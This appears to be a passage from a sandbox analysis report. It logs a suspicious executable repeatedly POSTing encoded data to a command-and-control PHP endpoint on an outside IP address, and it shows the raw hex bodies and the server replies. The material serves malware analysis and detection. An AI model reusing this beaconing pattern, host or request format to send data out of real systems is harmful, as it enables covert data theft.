                                                            Nov 21, 2023 04:48:25.067761898 CET513OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.277538061 CET513INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:25.277765989 CET516OUTData Raw: 52 5d 58 5f 5e 58 5a 58 5d 57 55 57 55 5c 57 54 50 5d 58 41 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X_^XZX]WUWU\WTP]XAVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_+;1<;U*/)4\)33-S3>S9*>?(->&G''^)/
                                                            Nov 21, 2023 04:48:25.479048967 CET516INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            88192.168.2.54980377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:25.067761898 CET513OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.277538061 CET513INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:25.277765989 CET516OUTData Raw: 52 5d 58 5f 5e 58 5a 58 5d 57 55 57 55 5c 57 54 50 5d 58 41 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X_^XZX]WUWU\WTP]XAVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_+;1<;U*/)4\)33-S3>S9*>?(->&G''^)/
                                                            Nov 21, 2023 04:48:25.479048967 CET516INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8977.91.124.10180192.168.2.549804C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:25.800508976 CET517OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.999167919 CET517INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:25.999428034 CET520OUTData Raw: 52 5c 5d 5b 5b 52 5a 5c 5d 57 55 57 55 56 57 53 50 5d 58 40 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\][[RZ\]WUWUVWSP]X@V^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X+(%<"R*,5"*9\(3.V$[&R30.+:?<^,.&G''^)
                                                            Nov 21, 2023 04:48:26.209800005 CET520INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            89192.168.2.54980477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:25.800508976 CET517OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.999167919 CET517INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:25.999428034 CET520OUTData Raw: 52 5c 5d 5b 5b 52 5a 5c 5d 57 55 57 55 56 57 53 50 5d 58 40 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\][[RZ\]WUWUVWSP]X@V^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X+(%<"R*,5"*9\(3.V$[&R30.+:?<^,.&G''^)
                                                            Nov 21, 2023 04:48:26.209800005 CET520INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9192.168.2.54972177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:32.397201061 CET178OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.596981049 CET179INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.597275019 CET181OUTData Raw: 52 58 58 50 5b 53 5a 5f 5d 57 55 57 55 58 57 52 50 59 58 47 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXP[SZ_]WUWUXWRPYXGVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*X+1=U7Z.$#*!]+V0=:Q0%-9?/4/.&G''^)?
                                                            Nov 21, 2023 04:47:32.802401066 CET184INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5c 26 2c 20 5a 21 23 33 10 29 29 36 0f 3a 00 2a 45 3c 0a 31 5b 25 2e 20 5a 27 29 22 0d 3f 11 02 10 27 29 24 54 34 25 38 11 3e 0a 21 5a 0c 1d 26 5a 21 2b 33 52 3f 00 0a 5a 3c 03 37 07 26 1f 02 07 3f 3e 2f 18 21 23 0d 59 31 23 15 09 38 11 31 5f 2e 28 36 40 27 3c 32 1d 22 3d 23 5f 0c 14 27 18 21 57 23 5e 34 09 21 0d 36 0e 3c 59 20 1a 3b 11 27 3d 0e 57 26 38 0f 17 3c 06 3b 0e 25 37 3f 08 27 2a 24 0b 31 39 2b 56 3f 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "\&, Z!#3))6:*E<1[%. Z')"?')$T4%8>!Z&Z!+3R?Z<7&?>/!#Y1#81_.(6@'<2"=#_'!W#^4!6<Y ;'=W&8<;%7?'*$19+V?&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            977.91.124.10180192.168.2.549721C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:32.397201061 CET178OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.596981049 CET179INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.597275019 CET181OUTData Raw: 52 58 58 50 5b 53 5a 5f 5d 57 55 57 55 58 57 52 50 59 58 47 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RXXP[SZ_]WUWUXWRPYXGVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*X+1=U7Z.$#*!]+V0=:Q0%-9?/4/.&G''^)?
                                                            Nov 21, 2023 04:47:32.802401066 CET184INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 22 5c 26 2c 20 5a 21 23 33 10 29 29 36 0f 3a 00 2a 45 3c 0a 31 5b 25 2e 20 5a 27 29 22 0d 3f 11 02 10 27 29 24 54 34 25 38 11 3e 0a 21 5a 0c 1d 26 5a 21 2b 33 52 3f 00 0a 5a 3c 03 37 07 26 1f 02 07 3f 3e 2f 18 21 23 0d 59 31 23 15 09 38 11 31 5f 2e 28 36 40 27 3c 32 1d 22 3d 23 5f 0c 14 27 18 21 57 23 5e 34 09 21 0d 36 0e 3c 59 20 1a 3b 11 27 3d 0e 57 26 38 0f 17 3c 06 3b 0e 25 37 3f 08 27 2a 24 0b 31 39 2b 56 3f 00 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "\&, Z!#3))6:*E<1[%. Z')"?')$T4%8>!Z&Z!+3R?Z<7&?>/!#Y1#81_.(6@'<2"=#_'!W#^4!6<Y ;'=W&8<;%7?'*$19+V?&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9077.91.124.10180192.168.2.549805C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:26.539843082 CET521OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:26.737345934 CET521INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:26.738204956 CET524OUTData Raw: 52 5b 5d 5a 5b 5d 5a 58 5d 57 55 57 55 5e 57 55 50 52 58 44 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z[]ZX]WUWU^WUPRXDVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>8"+8"W> 8,&#:%+U:'"$>W9+5+,';&G''^)?
                                                            Nov 21, 2023 04:48:26.941642046 CET524INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            90192.168.2.54980577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:26.539843082 CET521OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:26.737345934 CET521INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:26.738204956 CET524OUTData Raw: 52 5b 5d 5a 5b 5d 5a 58 5d 57 55 57 55 5e 57 55 50 52 58 44 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z[]ZX]WUWU^WUPRXDVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>8"+8"W> 8,&#:%+U:'"$>W9+5+,';&G''^)?
                                                            Nov 21, 2023 04:48:26.941642046 CET524INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9177.91.124.10180192.168.2.549806C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:27.268814087 CET525OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:27.467691898 CET525INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:27.467921019 CET528OUTData Raw: 52 5d 5d 5d 5e 58 5a 50 5d 57 55 57 55 5f 57 51 50 5d 58 47 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]]^XZP]WUWU_WQP]XGVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8=?> <8'*")5Y+%&>2Q001:]=?<7;&G''^)#
                                                            Nov 21, 2023 04:48:27.673158884 CET528INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            91192.168.2.54980677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:27.268814087 CET525OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:27.467691898 CET525INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:27.467921019 CET528OUTData Raw: 52 5d 5d 5d 5e 58 5a 50 5d 57 55 57 55 5f 57 51 50 5d 58 47 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]]^XZP]WUWU_WQP]XGVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*8=?> <8'*")5Y+%&>2Q001:]=?<7;&G''^)#
                                                            Nov 21, 2023 04:48:27.673158884 CET528INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9277.91.124.10180192.168.2.549807C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:27.988404036 CET529OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.185064077 CET529INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.185298920 CET532OUTData Raw: 52 5d 58 5b 5b 5f 5a 5b 5d 57 55 57 55 5e 57 53 50 5d 58 46 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X[[_Z[]WUWU^WSP]XFVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=*?&W>308)"95Y(0&R$.!33:W,;X<,;X;>&G''^)
                                                            Nov 21, 2023 04:48:28.386883974 CET532INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            92192.168.2.54980777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:27.988404036 CET529OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.185064077 CET529INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.185298920 CET532OUTData Raw: 52 5d 58 5b 5b 5f 5a 5b 5d 57 55 57 55 5e 57 53 50 5d 58 46 56 52 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X[[_Z[]WUWU^WSP]XFVRWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=*?&W>308)"95Y(0&R$.!33:W,;X<,;X;>&G''^)
                                                            Nov 21, 2023 04:48:28.386883974 CET532INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            93192.168.2.54980877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:28.395704985 CET533OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.592679977 CET534INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.592916012 CET535OUTData Raw: 57 50 5d 5b 5b 5a 5a 5a 5d 57 55 57 55 5c 57 5a 50 52 58 40 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
